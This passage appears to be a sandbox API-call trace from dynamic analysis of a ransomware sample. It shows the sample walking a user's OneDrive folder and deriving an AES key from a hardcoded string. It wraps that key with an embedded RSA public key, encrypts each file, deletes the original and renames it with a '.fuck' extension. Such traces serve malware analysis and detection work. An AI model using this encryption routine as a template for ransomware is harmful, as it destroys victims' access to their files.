lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.842] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.842] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.842] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.842] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.842] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.842] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.842] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.842] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.842] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.842] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.843] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.843] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.843] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.843] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.843] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.843] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.843] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.843] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.843] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.843] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.843] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.844] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.844] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.844] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.844] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.844] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.844] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.854] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.gif.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.gif"), bFailIfExists=0) returned 1 [0272.885] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif", dwFileAttributes=0x0) returned 1 [0272.885] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.gif.gsg")) returned 1 [0272.890] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.gif"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.gif.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.gif.fuck")) returned 1 [0272.894] CryptDestroyHash (hHash=0x2fa748) returned 1 [0272.894] CryptDestroyKey (hKey=0x2fa4c8) returned 1 [0272.894] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0272.894] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0272.895] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0272.895] GetLastError () returned 0x0 [0272.895] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.png")) returned 0x20 [0272.895] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png", dwFileAttributes=0x80) returned 1 [0272.896] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0272.897] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0272.898] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png.gsg", dwFileAttributes=0x2) returned 1 [0272.898] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0272.901] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0272.901] lstrlenA (lpString="VjnQjmgTDrnneBnnDhUveiykzMlQm") returned 29 [0272.901] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb738, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0272.901] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0272.901] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0272.901] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0272.901] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f28fe0) returned 1 [0272.902] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28fe0, dwCertEncodingType=0x1, pInfo=0x2f332d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33300*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33308*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fac48) returned 1 [0272.902] CryptEncrypt (in: hKey=0x2fac48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0272.902] CryptEncrypt (in: hKey=0x2fac48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29970*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f29970*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0272.902] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f29970*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f29970*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0272.904] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.945] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.945] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.958] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.958] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.958] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.959] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.959] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.959] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.959] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.959] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.959] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.959] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.959] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.959] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.960] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.960] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.960] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.960] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.960] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.960] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.960] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.960] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.960] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.960] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.960] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.960] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.960] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.961] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.961] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.961] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.961] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.961] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.961] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x172, lpOverlapped=0x0) returned 1 [0272.961] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x172, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x180) returned 1 [0272.961] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x180, lpOverlapped=0x0) returned 1 [0272.961] CloseHandle (hObject=0x5d4c) returned 1 [0272.961] CloseHandle (hObject=0x5d3c) returned 1 [0272.961] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.png"), bFailIfExists=0) returned 1 [0272.965] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png", dwFileAttributes=0x0) returned 1 [0272.965] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.png.gsg")) returned 1 [0272.967] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\AutoPlayOptIn.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\autoplayoptin.png.fuck")) returned 1 [0272.968] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0272.968] CryptDestroyKey (hKey=0x2fa748) returned 1 [0272.968] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0272.968] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0272.968] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0272.969] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0272.969] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0272.969] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0272.969] GetLastError () returned 0x0 [0272.969] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\filesync.localizedresources.dll.mui")) returned 0x20 [0272.970] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0272.970] CreateFileA 